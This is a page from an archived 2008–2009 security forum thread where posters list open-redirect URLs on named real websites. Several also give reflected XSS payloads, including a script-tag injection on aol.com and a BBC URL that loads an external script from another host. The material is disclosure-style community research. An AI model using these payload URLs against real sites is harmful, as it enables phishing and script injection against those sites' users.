Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous1234567891011
Current Page: 11 of 11
Re: So it begins - Redirects Edition
Posted by: tx
Date: February 13, 2008 03:28PM

Another yahoo redirect, I don't think that this has been disclosed yet: http://av.rds.yahoo.com/**http%3a//www.google.com/

There was a similar one posted before, but that now gives a warning page: http://rds.yahoo.com/**http%3a//www.google.com/

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: February 21, 2008 02:17PM

http://clk.about.com/?zi=1/1&zu=http://sla.ckers.org

also xss, if you prefer: http://clk.about.com/?zi=1/1&zu=javascript:alert%28document.domain%29

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 02/21/2008 02:22PM by tx.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Malkav
Date: February 21, 2008 02:38PM

i don't understand. av.rds.yahoo.com is a fourth level domain. if they had properly implemented redirection attacks filtering wouldn't be it covered by rds.yahoo.com, being the *exact same* ?

omg, please. no. they have *hardcoded* this fscking workaround ?

well, looks like they're ready to form MicroHoo! they already have the same bug management system...

----------------------------------------------------------------------------------------------------------------

Those that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety.
--Benjamin Franklin

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: cyrus
Date: May 03, 2008 09:02AM

http://www.backboris.com/includes/settext.php?redir=http://www.holditupforridicule.com/borisrace.JPG

Newly elected Mayor of London! Lord save us!



Edited 1 time(s). Last edit at 05/03/2008 09:12AM by cyrus.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: KleverOneR
Date: May 22, 2008 03:35PM

http://www.lexico.com/go/http://sla.ckers.org/forum/


creators of dictionary.com, thesaurus.com, reference.com

Options: ReplyQuote
Re: So it begins - Redirects Edition
Date: June 06, 2008 01:51AM

https://login.manageyourloans.com/CALM/login.do?command=showLoginPage&destAppName=SallieMae&returnUrl=https://www.google.com

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: trev
Date: June 20, 2008 04:17AM

Nice job, AWStats - let's include a redirector, just in case somebody will need it:

http://pierceive.com/cgi-bin/awstats/awredir.pl?url=http://google.com/

A quote from that script:

if (! $ENV{'GATEWAY_INTERFACE'}) {      # Run from command line
        print "----- $PROG $VERSION (c) Laurent Destailleur -----\n";
        print "This script is absolutely not required to use AWStats.\n";
        print "It's a third tool that can help webmaster in their tracking tasks but is\n";
        print "not used by AWStats engine.\n";
        print "\n";
        print "This tools must be used as a CGI script. When called as a CGI, it returns to\n";
        print "browser a redirector to tell it to show the page provided in 'url' parameter.\n";
        print "So, to use this script, you must replace HTML code for external links onto your\n";
        print "HTML pages from\n";
        print "<a href=\"http://externalsite/pagelinked\">Link</a>\n";
        print "to\n";
        print "<a href=\"http://mysite/cgi-bin/awredir.pl?url=http://externalsite/pagelinked\">Link</a>\n";
        print "\n";
        print "For your web visitor, there is no difference. However this allow you to track\n";
        print "clicks done on links onto your web pages that point to external web sites,\n";
        print "because an entry will be seen in your own server log, to awredir.pl script\n";
        print "with url parameter, even if link was pointing to another external web server.\n";
        print "\n";
        sleep 2;
        exit 0;
}

But does anybody care to read this?

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: June 22, 2008 03:00PM

@trev: XSS too http://pierceive.com/cgi-bin/awstats/awredir.pl?url=javascript:eval(document.location.hash.substr(1))#alert%28document.domain%29 , gotta love it! :\

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 06/22/2008 03:03PM by tx.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: asilvermtzion
Date: July 27, 2008 05:15PM

Haha, the awstats thing is mental.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Kyo
Date: August 04, 2008 08:58PM

http://search.aol.tw/aol/redir?src=PTL&clickedItemURN=http://wocares.com

what's interesting about this is that aol.tw and aol.com have different security standards, because contrary to aol.tw, aol.com warns you

http://search.aol.com/aol/redir?src=PTL&clickedItemURN=http://wocares.com

what's EVEN MORE funny is that the better security of aol.com contains XSS:

hxxp://search.aol.com/aol/redirWarn?redirAuth=nauth&clickedItemURN=http://wocares.com/sieben"><script>alert('XSS')</script>



Edited 1 time(s). Last edit at 08/04/2008 09:00PM by Kyo.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: C1c4Tr1Z
Date: August 04, 2008 09:50PM

Another aol redirection:

http://www.aol.com/redir.adp?_e_t=ap&_a_v=2.0&_a_i=100214839x1203415855x1200131198&_url=http://www.xssed.com/

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: trev
Date: August 05, 2008 06:16PM

Courtesy of McAfee.com: [server.iad.liveperson.net]

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: iNs4n3
Date: October 24, 2008 11:02AM

http://barrasapo.mredir.sapo.pt/sla.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: C1c4Tr1Z
Date: October 24, 2008 05:40PM

http://messagebot.com/cgi-bin/click.cgi?http://sla.ckers.org/forum/

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: December 12, 2008 10:59PM

Meant to post here: http://sla.ckers.org/forum/read.php?3,44,25604#msg-25604

So in the meantime, enjoy this obvious link: http://anonym.to//http%3A//google.com

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 12/12/2008 11:04PM by tx.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: January 26, 2009 04:56PM

It may be obvious, but it redirects upon successful login. http://www.livejournal.com/?returnto=http%3A%2f%2fsla.ckers.org

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 01/26/2009 04:57PM by tx.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Jurpie
Date: May 17, 2009 04:16AM

rsnake Wrote:
-------------------------------------------------------
> Anyone want to make their own articles?
> http://www.bbc.co.uk/cgi-bin/navigation/mailto.pl?
> from=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%
> 3E&subject=&body=&x=66&y=15&REFERER=http%3A%2F%2Fw
> ww.bbc.co.uk%2Fmobile%2Fweb%2Findex.shtml

Page still not fixed, you can still make your own articles:

http://www.bbc.co.uk/cgi-perl/navigation/mailto.pl?from=&subject=&body=%3C/textarea%3E%3Cscript%20src=%22http://jurriaanpruis.nl/bbc_js.js%22%3E%3C/script%3E&x=66&y=15&REFERER=http%3A%2F%2Fwww.bbc.co.uk%2Fmobile%2Fweb%2Findex.shtml

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: sirdarckcat
Date: June 21, 2009 11:34PM

If you find an open redirect on Amazon you have an open redirect on google:

http://www.google.com/tbproxy/redir?hl=en&lt=isbn&q=../../../open-redirect

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Mazlo
Date: July 31, 2009 01:08PM

Documentation/pages generated by ComponentOne's Doc To Help product have a (framed) open redirect vulnerability. ComponentOne was notified almost a year ago. Anyways, this product has been used by lots of companies to create some public help pages...

Try a Google search - allinurl:/nethelp/default.htm

For example:
http://www.softpro.hr/NetHelp/NetHelp/default.htm?turl=http://sla.ckers.org

javascript and data work too.

-Mazlo

Options: ReplyQuote
Pages: Previous1234567891011
Current Page: 11 of 11


Sorry, only registered users may post in this forum.